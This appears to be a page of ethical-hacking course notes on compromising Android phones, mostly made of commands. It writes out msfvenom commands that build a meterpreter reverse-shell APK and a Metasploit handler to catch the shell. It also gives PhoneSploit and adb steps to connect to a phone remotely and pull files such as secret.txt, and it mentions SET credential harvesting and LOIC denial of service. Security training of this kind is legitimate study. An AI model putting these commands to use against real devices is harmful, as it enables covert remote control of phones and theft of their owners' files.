1. Hack Android Devices

1. Hack Android devices with binary payload msfvenom

Create payload

msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP  LPORT=LocalPort -f raw > android_shell.apk
msfvenom –p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=Localhost IP  LPORT=LocalPort R > android_shell.apk

Open multihandler and set the payload as following

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your-ip-address>
set LPORT 4444
exploit

After getting the shell

pwd
cd /sdcard
ps

2. Harvest credentials using SET

Refer to SET tutorial to capture the credentials

3. DOS using LOIC on Android

LOIC apk available. Use that

4. Exploit android platform with ADB using phonesploit

GitHub - aerosol-can/PhoneSploit: A tool for remote ADB exploitation in Python3 for all Machines.GitHub

Installation

apt install adb
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
python3 phonesploit.py

If adb not found error

sudo apt update
sudo apt install android-tools-adb android-tools-fastboot

# Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
# Type 4, to Access Shell on phone

pwd
ls
cd sdcard
ls
cd Download
exit  \\to move to previous menu
#Download File using PhoneSploit
9. Pull Folders from Phone to PC

Enter the Full Path of file to Download
sdcard/Download/secret.txt

Doing the same stuff with adb

apt-get update
sudo apt-get install adb -y
adb devices -l

# Connection Establish Steps
adb connect 192.168.0.4:5555
adb devices -l
adb shell  

# Download a File from Android using ADB tool
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt 
adb pull sdcard/log.txt /home/mmurphy/Desktop

5. Hack android devices with AndroRAT

PreviousModule 17. Hacking Mobile Platforms Next2. Secure Android Device

Last updated 4 months ago